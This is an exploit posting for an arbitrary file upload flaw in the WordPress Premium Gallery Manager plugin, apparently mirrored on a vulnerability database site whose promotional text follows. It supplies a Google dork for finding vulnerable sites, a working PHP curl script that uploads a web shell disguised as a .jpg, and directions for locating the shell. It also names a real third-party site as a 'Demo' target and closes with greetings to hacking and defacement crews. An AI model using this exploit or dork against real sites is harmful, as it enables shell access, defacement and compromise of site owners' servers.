`
Wordpress Plugins Premium Gallery Manager Arbitrary File Upload
######################################################################################
# Author : eX-Sh1Ne
#
# Facebook : www.fb.me/ShiNe.gov
#
# Google Dork => inurl:"wp-content/plugins/Premium_Gallery_Manager"
#
#######################################################################################
Vuln : wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php
Exploit :
<?php
$uploadfile="Sh1Ne.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/Premium_Gallery_Manager/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/Premium_Gallery_Manager/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
-------------------------------------------------------------------------------------
Shell Access :
http://localhost/wp-content/plugins/Premium_Gallery_Manager/uploadify/Sh1Ne.php.jpg
or
http://localhost/wp-content/uploads/[years]/[month]/ << Find your shell
-------------------------------------------------------------------------------------
Demo :
http://hotelhofn.is/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
-------------------------------------------------------------------------------------
sh00tz :
[+] Special Greetz for ViviHoney - Sanjungan Jiwa
[+] Java Defacer Team - IDCA Team - No-Name Crew - IL-c0de - Bandung Blackhat
[+] Admin07 - Freezer22 - Pr0blemNymouz - Black Style - FH04ZA - MS06-87 - hantu_j4va - Antonio HsH - Taqiyya
[+] Mr. Xenophobic - Deflectoz - DeYuBi-Cyber - Mbah_Dukun - Mr./AryeaKoplaxz404 - Sanja07 - ice-cream - p0zh1e - [+] K4C3 Undetected
\!/ INDONESIAN PEOPLE HERE \!/
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation